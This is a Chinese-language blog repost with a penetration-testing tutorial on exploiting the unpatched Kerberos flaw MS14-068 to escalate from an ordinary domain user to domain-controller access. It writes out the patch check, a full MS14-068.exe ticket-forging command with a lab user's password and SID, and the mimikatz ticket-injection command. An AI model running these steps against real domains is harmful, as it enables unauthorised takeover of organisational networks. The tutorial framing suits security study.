zoukankan      html  css  js  c++  java
  • jQuery火箭图标返回顶部代码

    在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限。如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务器权限。

    MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测。

    systeminfo |find "3011780"


    如下,为空说明该服务器存在MS14-068漏洞。 

    存在如下拓扑图:

    域用户hack在域成员主机A上登录过,我们已经获得了域成员主机A的管理员权限, 并且通过mimikatz得到了域用户hack的用户名,密码,SID等值。域控存在MS14-068漏洞,现在我们想通过MS14-068漏洞访问域控。

    以下命令将生成 TGT_hack@xie.com.ccache 票据

    MS14-068.exe -u hack@xie.com -p h123456. -s S-1-5-21-2189311154-2766837956-1982445477-1110 -d 192.168.10.14 

     

    #MS14-068.exe -u 域用户@xie.com -p 域用户xie密码 -s 域用户xie的SID -d 域控ip

    在mimikatz中导入票据

     

    kerberos::ptc 票据路径

     


    访问域控验证是否成功

     

    注:注入票据时,机器不能是03或xp,因为mimikatz不支持这两个机器注入

  • 相关阅读:
    dom4j操作xml
    iOS 导航栏的那些事儿
    iOS--定时器(几种定时器的对比)
    iOS--优秀博客记录
    iOS--基础--文件操作
    iOS--动画--GitHub前50名的Objective-C动画相关库
    iOS--资料--类目Category收集
    iOS--资料--开源收集
    iOS--资料--开源项目及库
    ios--控件--自定义封装一个控件
  • 原文地址:https://www.cnblogs.com/kuaile1314/p/11924899.html
Copyright © 2011-2022 走看看